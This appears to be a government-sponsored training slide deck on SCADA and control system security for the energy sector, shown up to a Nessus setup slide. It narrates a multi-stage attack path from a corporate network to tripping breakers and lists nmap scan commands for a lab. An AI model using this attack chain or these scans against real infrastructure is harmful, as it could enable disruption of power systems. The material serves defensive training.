0 ratings0% found this document useful (0 votes)
273 views218 pagesEnergy Sector Cybersecurity Training
The document discusses a training program hosted by the National SCADA Test Bed (NSTB) that aims to enhance control systems security in the energy sector. The training provides an overview of control systems, teaches methods for discovering and analyzing vulnerabilities, and discusses applying security strategies while balancing security and business needs. The agenda covers control system components, risk assessments, exploit demonstrations, security requirements, and interactive activities using security tools and techniques.
Uploaded by
Randy LangleyCopyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0 ratings0% found this document useful (0 votes)
273 views218 pagesEnergy Sector Cybersecurity Training
The document discusses a training program hosted by the National SCADA Test Bed (NSTB) that aims to enhance control systems security in the energy sector. The training provides an overview of control systems, teaches methods for discovering and analyzing vulnerabilities, and discusses applying security strategies while balancing security and business needs. The agenda covers control system components, risk assessments, exploit demonstrations, security requirements, and interactive activities using security tools and techniques.
Uploaded by
Randy LangleyCopyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 218
NSTB
National SCADA Test Bed
enhancing control systems security in the energy sector
Hands-on Control System
Cyber Security Training
Program Sponsor:
Department of Energy
National SCADA Test Bed
NSTB Enhancing Control Systems Security in the Energy Sector
Disclaimer
References made herein to any specific commercial
product, process, or service by trade name, trademark,
manufacturer, or otherwise, does not necessarily
constitute or imply its endorsement, recommendation,
or favoring by the U.S. Government or any agency
thereof
The attacks and exploits shown in the demonstration
are not specific to any vendor technology
Use the described security tools and techniques at
your own risk i.e., carefully evaluate any tool prior to
using it in a production network.
NSTB Enhancing Control Systems Security in the Energy Sector
Why this class?
The Security Mindset
-- Difficult to teach / learn
-- Makes us better defenders
Security requires a particular mindset. Security professionals -- at least the good ones see
the world differently. They can't walk into a store without noticing how they might shoplift.
They can't use a computer without wondering about the security vulnerabilities. They can't
vote without trying to figure out how to vote twice. They just can't help it.
This kind of thinking is not natural for most people. It's not natural for engineers. Good
engineering involves thinking about how things can be made to work; the security
mindset involves thinking about how things can be made to fail. It involves thinking like
an attacker, an adversary or a criminal. You don't have to exploit the vulnerabilities you
find, but if you don't see the world that way, you'll never notice most security problems.
Given that, is it ethical to research new vulnerabilities?
Unequivocally, yes. Despite the risks, vulnerability research is enormously valuable.
Security is a mindset, and looking for vulnerabilities nurtures that mindset. Deny
practitioners this vital learning tool, and security suffers accordingly.
-- Bruce Schneier, CRYPTO-GRAM, April, May, 2008
NSTB Enhancing Control Systems Security in the Energy Sector
Goals
When you are finished with this training, you will:
Understand some key issues in cyber security and how
they relate to control systems
Learn methods that can be used to
Discover and Analyze vulnerabilities in control system environments
Network design
Operating systems
Critical communications paths
Applications
Apply contemporary security mitigation strategies to control systems
Understand the delicate balance between security and business
operations in the control system domain
NSTB Enhancing Control Systems Security in the Energy Sector
Agenda
Introduction (you are here)
SCADA & Control Systems Overview
Risk to Control Systems
Exploit Demonstration
NERC Security Requirements
SCADA Security Chalk Talk
Interactive Activity
Loading the Live CD for testing the environment
Toolkit discussion and set-up
Enumerating/Analyzing the networks
Defence, Detection, and Analysis
Interactive Discussion
Breaks will be as required
NSTB Enhancing Control Systems Security in the Energy Sector
SCADA & Control Systems
Overview
NSTB Enhancing Control Systems Security in the Energy Sector
Control System Basics
I/O
Meters
Sensors
Field Devices
.
.
.
FIELD DEVICES
Remote
PLC
IED
RTU
Controller
.
.
.
Communication
FEP
Protocols
Wired
Wireless
.
.
.
Master
SCADA
HMI
EMS
DCS
.
.
.
CONTROL CENTER
NSTB Enhancing Control Systems Security in the Energy Sector
SCADA & CS Components
Sensors and Field Devices
RTU Remote Terminal Unit or Remote Telemetry Unit
IED Intelligent Electronic Device
PLC Programmable Logic Controller
FEP / Protocol Pre-processor Front End Processor
HMI / Operator Console Human Machine Interface
PCS Process Control System
DCS Distributed Control System
SCADA Supervisory Control and Data Acquisition
EMS Energy Management System
NSTB Enhancing Control Systems Security in the Energy Sector
Sensors and Field Devices (Inputs)
Discrete Sensors
Typically provided by contacts that are either
open or shut to indicate an on or off condition,
or a high or low alarm level
Analog Sensors
Convert continuous parameters such as
temperature or flow to analog signals such as
4-20mA or 0-10V
How Do They Get into the Control System?
To get field information into the control
system, the electric signals must be digitized.
This is done using equipment such as RTUs,
PLCs, IEDs
Sensor
Transmitter
9
NSTB Enhancing Control Systems Security in the Energy Sector
The RTU
Remote Terminal Units (RTU)
Convert analog and discrete
measurements to digital
information
Contain analog and discrete
inputs
Numerous communications
options and data protocols
Also used for:
Data concentration
Protocol conversion
Also known as
Remote Telemetry Units
10
NSTB Enhancing Control Systems Security in the Energy Sector
The IED
Electro-Mechanical Relays,
Meters, and Controls
Intelligent Electronic Devices
(IED)
Modern microprocessorbased controllers
Built-in I/O
One IED can have
hundreds to thousands of
data points
Built-in Communications
IEDs are frequently
networked using serial or
Ethernet-based
communication protocols,
but this is not required
Other Features
Contain logical expressions
User configurable
Replacement IEDs
communications data map
Event recording with pointon wave accuracy
Configuration can be done
remotely
11
NSTB Enhancing Control Systems Security in the Energy Sector
The PLC
L1
STOP
Programmable logic controllers
(PLCs) were developed as a
replacement for relay-based control
PLCs retain the ladder logic
functionality but today are capable
of higher-level programming
languages such as C++
Some PLCs use the following
programming methods:
Structured text
Function block diagram
Sequential function chart
Instruction list
L2
START
M
M
O.L.
S
R
Basic Motor Control Ladder Logic
12
NSTB Enhancing Control Systems Security in the Energy Sector
PLC Programming Trends
Current Technologies Used in PLCs
Are network enabled
They can be programmed remotely
PLCs are starting to merge with embedded PCs
Onboard I/O servers, web servers, FTP, and SNMP embedded
Universal Programming (IEC 61131-3 )
Most PLCs have very minimal security
13
NSTB Enhancing Control Systems Security in the Energy Sector
The HMI
A human-machine interface (HMI) is used to give a graphical
representation of the controlled environment to the operator.
Used for control, monitoring, and alarming
Can be software systems on a PC or standalone systems like touch
panels, handheld devices, or panel-mounted displays
Used in some cases to collect data from devices (PLCs, IEDs, etc.)
and display or send the data to a database for historical trending
14
NSTB Enhancing Control Systems Security in the Energy Sector
The DCS
The Distributed Control System (DCS) has a centralized control panel
and can consist of a collection of other control systems
Commonly found in oil and gas, chemical, water, and waste water
systems
Built for advanced process control
15
NSTB Enhancing Control Systems Security in the Energy Sector
More on DCS
Physical hardware similar to PLC
Rack and slot convention
Redundant processors on UPS backup power
Built for real-time control
Communications
Proprietary backbone protocols
Communications with other systems primarily for ALARMING
Reliability is #1
Systems availability > 99%
Industrial hardened equipment
16
NSTB Enhancing Control Systems Security in the Energy Sector
SCADA or DCS?
Supervisory Control and Data Acquisition (SCADA) and Distributed
Control Systems (DCS) have historically been different:
The key word in SCADA is Supervisory. This indicates that
decisions are not directly made by the system. Instead, the
system executes control decisions based on control parameters
by operators or management. SCADA systems are typically
deployed across large geographical areas (eg. - electric grid)
DCS provides real-time monitoring and control of a given process
within a plant. All major components of the system are usually
confined to one or several close by facilities (eg. - refinery)
As technology advances, the terms are getting blurry. You will
quite often hear policy makers refer to SCADA when they are
really referring to another type of Industrial Control System.
17
NSTB Enhancing Control Systems Security in the Energy Sector
Support Servers
Support servers are standard servers with
an OS that perform specific function for the
control system.
Historical data loggers (Historians)
Databases that are used to store data
Data is used for historical trending on an HMI
or within engineering applications
Application servers (App Servers)
Can be used to serve up HMI screens to
operator (client) PCs
Screen changes only need to be made once
Other servers
SCADA servers / front-end processors
Communication gateways
Real-time database servers
18
NSTB Enhancing Control Systems Security in the Energy Sector
Leased Lines
Use existing switched phone system
Slow connections speeds (56k)
Not isolated from other phone systems
Large cost fluctuations
Sometimes its the cheaper solution
Sometimes its very expensive
Primary installations
Legacy systems
When wireless or IP solution isnt an option
19
NSTB Enhancing Control Systems Security in the Energy Sector
Dedicated Lines
More secure than leased lines
High installation costs
Lower recurring costs
Lines arent governed by a third party
Primary installations
May be Isolated systems
Serial communications
20
NSTB Enhancing Control Systems Security in the Energy Sector
Power Line Communications
Power Line Carrier
Superimposed analog signal over a 50 or 60 Hz AC system
Used in the electrical sector for command and control
Low data throughput (slow)
Broadband over Power Line
Common Last Mile solution
Regionally installed
Not used in rural settings
21
NSTB Enhancing Control Systems Security in the Energy Sector
Wired Media - Copper / Fiber
Used in both IP Ethernet and serial
applications
Large amount of compatible
devices
More security options
Ease of installation
22
NSTB Enhancing Control Systems Security in the Energy Sector
Wireless: Radios and WiFi
Radio
Commonly used
Spread spectrum or narrow band
Used in most industries
Low cost and quick installations
Speeds relative to 56kb modem
IEEE 802.11 (WiFi)
Extremely common
Inexpensive
Moderate to long range
Household 150m unmodified
Range increased using directional antennas
Various authentication technologies
Various encryption technologies
23
NSTB Enhancing Control Systems Security in the Energy Sector
Wireless: Microwave and Cellular
Microwave
Used frequently in pipeline control systems
and remote electrical substations
Large bandwidth compared to copper
Line of site limitations
Costly installations
Cellular
Use existing cellular telephone networks
Vendors integrating cellular capabilities
into products like transmitters
24
NSTB Enhancing Control Systems Security in the Energy Sector
Protocols (partial list)
ANSI X3.28
Gedac 7020
BBC 7200
ICCP
CDC Types 1 and 2 Landis & Gyr 8979
Conitel 2020/2000/3000 Modbus
DCP 1
OPC
DNP 3.0
ControlNet
DeviceNet
DH+
ProfiBus
Tejas 3 and 5
TRW 9550
UCA
Many homegrown and proprietary protocols are
available and used in control systems today.
NSTB Enhancing Control Systems Security in the Energy Sector
Network Layers
The OSI & the ARPA Layered Architecture
OSI
ARPA
Application
Process /
Application
Layer
Handling
Transport
Host-to-Host
Layer
Error Checking
Network
Internet
Layer
Routing
Network Interface
or Local
Network Layer
Delivery
Presentation
Session
Data Link
Physical
(Theoretical)
(Practical)
NSTB Enhancing Control Systems Security in the Energy Sector
DNP3.0
Distributed Network
Protocol (DNP) 3.0
Designed for SCADA
primarily for electrical
Industry
Supported functions include
SCADA/EMS applications
RTU to IED communications
Master to remote
communications
Emerging open
architecture standard
Also available as DNP
over IP
send request
accept response
confirmation, time-outs, error
recovery
DNP3 Packet Diagram
DNP3 Header
TC/UDP Header
IP Header
Ethernet Header
TH
TCP/IP Layer
ASDU + CRCs
TCP/UDP Data
IP Data
Ethernet Data
Application
Transport
Internet
Network
NSTB Enhancing Control Systems Security in the Energy Sector
OPC
Object Linking and Embedding (OLE) for
Process Control (OPC)
Original standard developed in 1996
Based on OLE, COM and DCOM from
Microsoft
Client / server orientation
Provides easy-to-use communication
architecture for remote Windows computers
and applications to work together
OPC-DA, OPC-DX, OPC-A&E, OPC-HDA
TCP/IP Layer
OPC
OPC Packet Diagram
4
RPC Header
TC/UDP Header
IP Header
Ethernet Header
IP Data
Ethernet Data
RPC
RPC/DCOM/OPC Data
TCP/UDP Data
DCOM (ORPC)
Transport
Internet
Network
NSTB Enhancing Control Systems Security in the Energy Sector
ICCP
Inter-Control Center Protocol (ICCP)
Also known as IEC60870-6 or TASE.2
Used within the electrical sector between control centers
Data source is mapped at the client and server
Secure version of ICCP incorporates digital certificate
authentication and encryption
Some process control networks are incorporating ICCP
into their systems
TCP/IP Layer
TASE.2 (ICCP)
ICCP Packet Diagram
4
TPKP
COTP
TCP Header
IP Header
Ethernet Header
SPDU
TCP Data
IP Data
Ethernet Data
PPDU
MMS
ACSE
MMS PDU
3
Transport
Internet
Network
NSTB Enhancing Control Systems Security in the Energy Sector
Modbus
Modbus ASCII
Modbus Plus (Modbus+, MB+)
Serial RS-232 or RS-485
Modbus RTU
(Most common)
Serial RS-232 or RS-485
Proprietary to Modicon
Twisted pair up to 1Mb/s
Uses token rotation
Modbus TCP
Transported within TCP/IP data
packets
Uses Port 502
Modbus TCP Packet Diagram
MBAP Header
TCP Header
IP Header
Ethernet Header
Function Code
TCP Data
IP Data
Ethernet Data
TCP/IP Layer
Data
Modbus TCP
Transport
Internet
Network
NSTB Enhancing Control Systems Security in the Energy Sector
Review
Welcome to another bowl of acronym soup
SCADA and DCS systems are large (geographically) and
complex
There are many unique devices (embedded) connected
to these networks
Communications travel over a variety of physical media
and utilize many different protocols
Reliability and Availability are number one
NSTB Enhancing Control Systems Security in the Energy Sector
Risk and Control Systems
NSTB Enhancing Control Systems Security in the Energy Sector
Risk is Elevated in Converged &
Interconnected Systems
Technology has blurred the line between the physical
machine and the electronic machine driving our infrastructure.
NSTB Enhancing Control Systems Security in the Energy Sector
Threat Trends
Threats More Complex as Attackers Proliferate
Malicious Code
Morphing
Stealth/Advanced
Scanning Techniques
Era
Intruder Knowledge
Attack Sophistication
High
Denial of Service
Network Management Diagnostics
Sweepers
Back Doors
Disabling Audits
Low
1980
of Modern
BOTS
Information
Zombies
Technology
Distributed Attack Tools
Control System WWW Attacks
Automated Probes/Scans
Zone of Defense
GUI
Packet Spoofing
Era of Legacy
Sniffers
Control System
Hijacking Sessions
Attackers
Technology
Exploiting Known Vulnerabilities
Password Cracking
Self-Replicating Code
Password Guessing
1985
1990
1995
2000
2005
2010
Lipson, H. F., Tracking and Tracing Cyber-Attacks: Technical Challenges and Global Policy Issues, Special Report CMS/SEI-2002-SR-009, November 2002, page 10.
NSTB Enhancing Control Systems Security in the Energy Sector
Looking at the Zone
Vulnerabilities especially
applicable to Control Systems
Problem exacerbated by lack of
authentication, authorization,
plain text traffic
NSTB Enhancing Control Systems Security in the Energy Sector
Cyber Threats: The Flattening of the Line
LIKELIHOOD
Less
Very
Strategic Information Warfare
Major Economic Gain
Cyber Terrorism
Asymmetric Warfare
Poisoned Data
Lose Confidence
Sophisticated
Injection
Directed Cyber Attacks Structured Hackers
Direct & Targeted Monetary Gain
Extreme Activist / Groups
Disgruntled Employee
Disruption
General Cyber Attacks - Less Structured
Notoriety and Fame
Worm
Just to Do It
Hacking Economy
DOS
System Control
GRP I
Mainstream
System Compromise
GRP II & III
Probe
Smallest
Directed
Corruption
Concentrated
DDOS
GRP II
Organized Crime
Competitors
Hackers for Hire
Activist
CONSEQUENCES
GRP III
Nation States
Terrorist
Largest
NSTB Enhancing Control Systems Security in the Energy Sector
Protocol Vulnerabilities: Expediting Attack Success
No authentication amongst isolated
components
Modbus/ICCP/DNP3 fully published and
open for review
OLE for Process Control (OPC)
NSTB Enhancing Control Systems Security in the Energy Sector
US-CERT Posted Vulnerabilities
NSTB Enhancing Control Systems Security in the Energy Sector
Davis Besse SQL Slammer
NSTB Enhancing Control Systems Security in the Energy Sector
Harrisburg, PA water facility
NSTB Enhancing Control Systems Security in the Energy Sector
Insider Threat
2 deny hacking into L.A.'s traffic
light system
Two accused of hacking into L.A.'s traffic light system plead not guilty. They
allegedly chose intersections they knew would cause major jams.
By Sharon Bernstein and Andrew Blankstein, Times Staff Writers - January 9, 2007
Back in August, the union representing the city's traffic engineers
vowed that on the day of their work action, "Los Angeles is not going
to be a fun place to drive."
City officials took the threat seriously.
Fearful that the strikers could wreak havoc on the surface street
system, they temporarily blocked all engineers from access to the
computer that controls traffic signals.
But officials now allege that two engineers, Kartik Patel and Gabriel
Murillo, figured out how to hack in anyway. With a few clicks on a
laptop computer, the pair one a renowned traffic engineer profiled
in the national media, the other a computer whiz who helped build the
system allegedly tied up traffic at four intersections for several
days.
Los Angeles Times
NSTB Enhancing Control Systems Security in the Energy Sector
Identify Vulnerable Components
Network comm.
Operating systems
Applications
NSTB Enhancing Control Systems Security in the Energy Sector
Identify Threat Vectors
Advisories
Exploit code
Advanced tools
NSTB Enhancing Control Systems Security in the Energy Sector
Identify Mitigations
Network comm.
Operating systems
Applications
NSTB Enhancing Control Systems Security in the Energy Sector
Exposure
System Exposure
Components
Vulnerabilities
Network comm.
Operating systems
Applications
Advisories
Exploit code
Advanced tools
Mitigation
GAP
Block
Detect
Workaround
Fix
NSTB Enhancing Control Systems Security in the Energy Sector
Review
SCADA systems are typically 10 15 years behind the
security curve
There are many different types of threats more than
what typical IT systems must worry about
Our goal in securing these system is to reduce our overall
vulnerability exposure
NSTB Enhancing Control Systems Security in the Energy Sector
SCADA Exploit Demonstration
NSTB Enhancing Control Systems Security in the Energy Sector
Demo Network Layout
NSTB Enhancing Control Systems Security in the Energy Sector
Demo Exploit Path
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Stage #1 Internet to Corporate
Client Side Attack:
Corporate user follows a malicious URL
Social engineering
From an email
From a suspicious web page
Triggers a vulnerability on the corp box
Exploit payload calls outbound
through the firewall to the attacker
internet host
Attacker gains remote control of the
corporate victim
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Stage #2 Reconnaissance
Victim #1 browser history indicates access to a separate subnet
(Victim #1 IP 192.168.2.32, HTTP IP - 192.168.3.21)
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Stage #2 Corporate to DMZ
Web Application Vulnerabilities
Help desk web application allows user to upload arbitrary files (trouble tickets)
Attacker uploads a new PHP file and also an executable rootkit
Website code has an SQL injection problem
Provides admin access to the website (privileged features)
Attacker makes an HTTP request to an existing admin page and changes the action on the
URL to include (aka execute) the uploaded PHP page
PHP is able to run system commands and launch the rootkit
Firewall policy:
Grants Victim #1 HTTP access to Victim #2
Victim #2 allowed any TCP connection to internet
Uploaded rootkit calls back to attacker machine
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Stage #3 Reconnaissance
Victim#2 Netstat shows an established connection to a new subnet
(Victim #2 IP 192.168.10.21, Remote Server IP 192.168.0.97)
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Stage #3 DMZ to SCADA
Tag Server Buffer Overflow
Exploit overflows the point name field
Firewall policy:
Grants Victim #2 access to Victim #3 on port 2000
Victim #3 allowed any TCP connection to internet
Exploit payload calls back to attacker machine
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Stage #3 Pretty Pictures (HMI)
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Send Commands to RTU/PLC
(Trip Breakers)
Attacker incrementally expanded attack
Gained remote control of host inside the control LAN
Controls the HMI or Substation from the internet
NSTB Enhancing Control Systems Security in the Energy Sector
Demo Exploit Path (Reminder)
NSTB Enhancing Control Systems Security in the Energy Sector
Demo System Vulnerabilities
Antiquated and/or unpatched
Operating systems
Services
Poorly defined firewall policy
Intrusion Detection System (IDS) is underutilized
Application coding problems
Unsafe function usage
Logic problems
Least Privileges principle has not been applied to
all applications, services, and the network design
NSTB Enhancing Control Systems Security in the Energy Sector
NERC
Security Requirements
NSTB Enhancing Control Systems Security in the Energy Sector
The CIP Standards The Condensed Version
CIP-002-1 Cyber Security Critical Cyber Asset Identification:
Requires a responsible entity to identify its critical assets and critical cyber
assets using a risk-based assessment methodology.
R1 Critical Asset Identification Method
R2 Critical Asset Identification
R3 Critical Cyber Asset Identification
R4 Annual Approval
CIP-003-1 Cyber Security Security Management Controls:
Requires a responsible entity to develop and implement security
management controls to protect critical assets identified pursuant to CIP002-1.
R1 Cyber Security Policy (NERC Top 10)
R2 Leadership
R3 Exceptions
R4 Information Protection
R5 Access Control
R6 Change Control and Configuration Management
NSTB Enhancing Control Systems Security in the Energy Sector
The CIP Standards The Condensed Version
CIP-004-1 Cyber Security Personnel and Training:
Requires personnel with access to critical cyber assets to have identity
verification and a criminal check. It also requires employee training.
R1 Awareness
R2 Training
R3 Personnel Risk Assessment
R4 Access
CIP-005-1 Cyber Security Electronic Security Perimeters:
Requires the identification and protection of an electronic security perimeter
and access points. The electronic security perimeter is to encompass the
critical cyber assets identified pursuant to the methodology required by CIP002-1.
R1 Electronic Security Perimeter
R2 Electronic Access Control
R3 Monitoring Electronic Access
R4 Cyber Vulnerability Assessment
R5 Documentation Review
NSTB Enhancing Control Systems Security in the Energy Sector
The CIP Standards The Condensed Version
CIP-006-1 Cyber Security Physical Security of Critical Cyber
Assets:
Requires a responsible entity to create and maintain a physical security
plan that ensures that all cyber assets within an electronic security
perimeter are kept in an identified physical security perimeter.
R1 Physical security Plan
R2 Physical Access Controls
R3 Monitoring Physical Access
R4 Logging Physical Access
R5 Access Log Retention
R6 Maintenance and Testing
NSTB Enhancing Control Systems Security in the Energy Sector
The CIP Standards The Condensed Version
CIP-007-1 Cyber Security Systems Security Management:
Requires a responsible entity to define methods, processes and procedures
for securing the systems identified as critical cyber assets, as well as the
non-critical cyber assets within an electronic security perimeter.
R1 Test Procedures
R2 Ports and Services
R3 Security Patch Management
R4 Malicious Software Prevention
R5 Account Management
R6 Security Status Monitoring
R7 Disposal or Redeployment
R8 Cyber vulnerability Assessment
R9 Documentation Review and Maintenance
NSTB Enhancing Control Systems Security in the Energy Sector
The CIP Standards The Condensed Version
CIP-008-1 Cyber Security Incident Reporting and Response
Planning:
Requires a responsible entity to identify, classify, respond to, and report
cyber security incidents related to critical cyber assets.
R1 Cyber Security Incident Response Plan
R2 Cyber Security Incident Documentation
CIP-009-1 Cyber Security Recovery Plans for Critical Cyber Assets:
Requires the establishment of recovery plans for critical cyber assets using
established business continuity and disaster recovery techniques and
practices.
R1 Recovery Plans
R2 Exercises
R3 Change Control
R4 Backup and Restore
R5 Testing Backup Media
NSTB Enhancing Control Systems Security in the Energy Sector
Security is a Never Ending Process
CIP-002 R2,R3
CIP-005 R1
CIP-002 R1, R2
CIP-004-1 R2
CIP-002 R3, M3
CIP-008
CIP-009
CIP-007
CIP-003
CIP-006
CIP-007
CIP-005 R4
CIP-007 R8
NSTB Enhancing Control Systems Security in the Energy Sector
NERC Top 10 Vulnerabilities - 2007
Introduction
The U.S. Department of Energy National SCADA Test Bed (NSTB)
program has provided initial recommended mitigation strategies to
the list of vulnerabilities prepared by the CSSWG members.
Three levels of mitigation strategies are proposed foundational,
intermediate, and advanced. Foundational strategies are
considered to be minimal mitigation strategies typically involving the
establishment of security policy an fundamental implementations.
Intermediate strategies are a next step in establishing a secure
posture and involve readily available technologies or the stronger
implement of baseline policies. Advanced mitigation strategies
provide long term achievable security posture guidance but may
include tools or technologies that are currently not readily available
NSTB Enhancing Control Systems Security in the Energy Sector
NERC Top 10 Vulnerabilities - 2007
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Inadequate Policies, Procedures, and Culture Governing Control System
Security
Inadequately designed control system networks that lack sufficient
defense-in-depth mechanisms
Remote access to the control system without appropriate access control
System administration mechanisms and software used in control systems
are not adequately scrutinized or maintained.
Use of inadequately secured wireless communication for control
Use of a non-dedicated communications channel for command and
control and/or inappropriate use of control system network bandwidth for
non-control purposes
Insufficient application of tools to detect and report on anomalous or
inappropriate activity
Unauthorized or inappropriate applications or devices on control system
networks
Control systems command and control data not authenticated
Inadequately managed, designed, or implemented critical support
infrastructure
NSTB Enhancing Control Systems Security in the Energy Sector
SCADA
Security Chalk Talk
NSTB Enhancing Control Systems Security in the Energy Sector
Electronic Perimeter
Internet
Provider
IT
Side
Corporate
Firewall
The World
Corporate Network
Non
IT Side
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Vectors Communications Lines
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Vectors Remote Comms / Modems
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Vectors Vendor Access
NSTB Enhancing Control Systems Security in the Energy Sector
Attack Vectors Database Connections
NSTB Enhancing Control Systems Security in the Energy Sector
Considerations
Knowledge of the process is key for long term
or surgical disruption
Field equipment generally doesnt contain
process knowledge
Breaker 17A
Valve 4
Direct access to field equipment without
additional knowledge generally only results
in nuisance disruption
NSTB Enhancing Control Systems Security in the Energy Sector
Manipulation of the System
Talk Directly to the Front-End Equipment
Often no userid/passwords required
Undocumented vendor protocols are common
Commands are generally not logged
NSTB Enhancing Control Systems Security in the Energy Sector
Manipulation of the System
Export the HMI Screen
Graphic pictures to describe the process
Noticeable by the operator
Can use your off-the-shelf tools
Have credentials of logged in user
May not be able to manipulate to failure
NSTB Enhancing Control Systems Security in the Energy Sector
Manipulation of the System
Peer Utility
ICCP
Often the least secured link
Necessary for operation in electric power
Peers often have limited rights on peers system
NSTB Enhancing Control Systems Security in the Energy Sector
Manipulation of the System
Changing Data in the Database
FEP
Database
HMI
Operator may make decisions based on bad data
Not all vendor systems vulnerable
NSTB Enhancing Control Systems Security in the Energy Sector
Manipulation of the System
Insert Commands in the Application Stream
FEP
HMI
Must understand vendor (or other) protocols
Logged as actions by the operator
Generally can bypass failure logic
May or may not need credentials
NSTB Enhancing Control Systems Security in the Energy Sector
Manipulation of the System
Change Operators Display
FEP
HMI
If presented with an out-of-control system, operator will
take steps to shut down
Logs will reflect operator actions & true state of system
Detailed knowledge of process needed to make
believable
NSTB Enhancing Control Systems Security in the Energy Sector
Observations from the Field
We have no outside communications.except for that
oneand that oneand that one
Hackers dont understand process control.
Patches have historically broken process control systems.
Fear of regulation is greater than fear of attack.
Its only one-way traffic, my vendor says he only writes to
the database.
NSTB Enhancing Control Systems Security in the Energy Sector
Review
The additional integration of the business IT environment
increases our system exposure
These complex systems have many potential points of
entry
Intelligently understanding SCADA is not trivial
Causing general havoc is easy
There are many core systems that need to be monitored
for malicious activity
NSTB Enhancing Control Systems Security in the Energy Sector
Network Security
Identification &
Remediation
(Interactive Module)
*Please be aware of sensitive personal data on your
PC, this is a shared network.
If you want to fully protect your data you may want
to remove your drive at this time.
NSTB Enhancing Control Systems Security in the Energy Sector
Interactive Guidelines
The interactive session will cover both scanning
and network analysis activities
You will be assessing Corporate, DMZ, and
Control networks
You will be provided an IP address for each
network
Corporate 192.168.2.0/24 DHCP 192.168.2.100-200
DMZ 192.168.3.0/24 DHCP 192.168.3.100-200
Control 192.168.1.0/24 DHCP 192.168.1.100-200
NSTB Enhancing Control Systems Security in the Energy Sector
Interactive Guidelines
You will be provided a customized Knoppix CD (with
tools) to boot your computer from
You will be using the Knoppix CD for most of the handson work
You also have the option to use your own tools
NSTB Enhancing Control Systems Security in the Energy Sector
Demo Network Layout
Group I
Group II
Group III
Well rotate networks during the course of the day
NSTB Enhancing Control Systems Security in the Energy Sector
Starting
1.
2.
3.
4.
5.
Insert Knoppix CD
Turn off / Shutdown (remove your HDD if desired)
Reboot and set you computer to boot from CD (F12)
Start your computer
Open a root console
Kmenu > Root shell
-- Reference the documentation provided at startup -Remember, the Linux man command is your friend!
NSTB Enhancing Control Systems Security in the Energy Sector
Starting
If your computer successfully boots you will be brought to this screen
NSTB Enhancing Control Systems Security in the Energy Sector
Starting
Root User
Shell
Knoppix User
Shell
Most of our exercises will be run from a Linux shell
NSTB Enhancing Control Systems Security in the Energy Sector
Basic Linux Shell Commands
Some of the common commands:
man <cmd>
- Open the manual page for a command
<cmd> --help
- Often invokes simple help instructions for a command
ls
- List directory contents (same as dir)
pwd
- Print the current working directory
rm
- Remove a file (same as del)
mv <src><dst> - Move a file
cp <src><dst>
- Copy a file
cd
- Change to a new directory
more <file>
- Prints contents of a file to the shell
less <file>
- Same as more, but different
cat <file>
- Same as more or less, but different
nano <file>
- Opens the file in a simple text editor
ifconfig
- Displays network adapter information (IP, MAC, etc)
pump
- DHCP client application (e.g. pump -i eth0)
To execute programs in a local directory (e.g. metasploit) use ./
./msfconsole
Tab completion is your friend Well show you how!
NSTB Enhancing Control Systems Security in the Energy Sector
Enumerate Network
Nmap is designed to allow system administrators
& curious individuals to scan large networks to
determine which hosts are up & what services they are
offering.
A Fast & Informative Network Scanner that
CAN Be Safely Used on isolated non-production
SCADA/Control System Networks. *
This tool can be DANGEROUS to your system, use with caution!
NSTB Enhancing Control Systems Security in the Energy Sector
Nmap Network Exploration
Nmap was originally designed to be run from the
command line (i.e. A Bash or DOS prompt)
Some common Nmap options:
-sS
TCP SYN Stealth Scanning (Default for root)
-sF
TCP FIN Stealth Scanning
-sX
Nmap Christmas Tree Scan (All TCP Flags Set)
-sN
Null Stealth Scanning (No TCP Flags Set)
-sP
Ping Sweep
-sV
Enable Version Probing
-O
OS Detection
-Tx
Timing Mode (Polite & Sneaky)
-oN <file> Save the results to a normal text file
-n
Do not resolve IP addresses (DNS)
NSTB Enhancing Control Systems Security in the Energy Sector
Nmap Network Exploration
Target hosts can be specified in many ways:
192.168.2.1-254
All 255 possible IP addresses on this subnet
192.168.2.0/24
Equivalent to the above but signifying a class C address block
192.168.1-4.1-254
Ranges are allowed for subnets as well
192.168.0.0/16
The 16-bit netmask will scan the entire class B address block
NSTB Enhancing Control Systems Security in the Energy Sector
Nmap Network Exploration
Discovery of ports
and services
NSTB Enhancing Control Systems Security in the Energy Sector
Nmap Network Exploration
There is a GUI for Nmap so that you don't need to
memorize all of the options, but we will be using the
command line in this class.
The options in the
menus accommodate
for the option flags
used in the command
line version.
NSTB Enhancing Control Systems Security in the Energy Sector
Exercises
Run the following nmap commands in a Linux shell
(dont forget the oN <file> option and replace the X with your subnet) :
nmap
nmap
nmap
nmap
nmap
sP
sS
sS
sV
A
n
n
n
n
-n
192.168.X.1-100
(Ping Scan)
192.168.X.1-100
(Syn Scan)
O p- 192.168.X.1-100 (Syn Scan w/ OS detection on all ports)
192.168.X.1-100
(TCP Connect Scan w/ version Detection)
192.168.X.1-100
(Everything Scan)
How did the results differ between these scans?
What different types of information are available?
NSTB Enhancing Control Systems Security in the Energy Sector
Review
Nmap is a network discovery tool and can be used for
identifying the systems currently connected to your
network. It will also allow you to audit what services are
running on the identified hosts.
What was discovered?
Did you see any new devices or computers?
Did you see your neighbors and their systems?
What services were observed?
What NERC requirements might Nmap be useful for?
NSTB Enhancing Control Systems Security in the Energy Sector
Nessus Security Scanner
The Nessus Security Scanner
is a Security Auditing Tool Made Up of Two Parts:
Server
Client
The Server,
Nessusd is in Charge
of the Attacks
The Client Nessus
Provides An Interface
to the User.
Nessus is the Standard for (Free)
Open Source Network Vulnerability Scanners
This tool can be DANGEROUS to your system, use with caution!
NSTB Enhancing Control Systems Security in the Energy Sector
The Nessus Client Screen
NSTB Enhancing Control Systems Security in the Energy Sector
Target Selection
192.168.2.88
These targets should be
what was discovered
with nmap. Use known
network addresses
192.168.2.88, a couple
others that you
discovered with nmap
NSTB Enhancing Control Systems Security in the Energy Sector
Scan Options
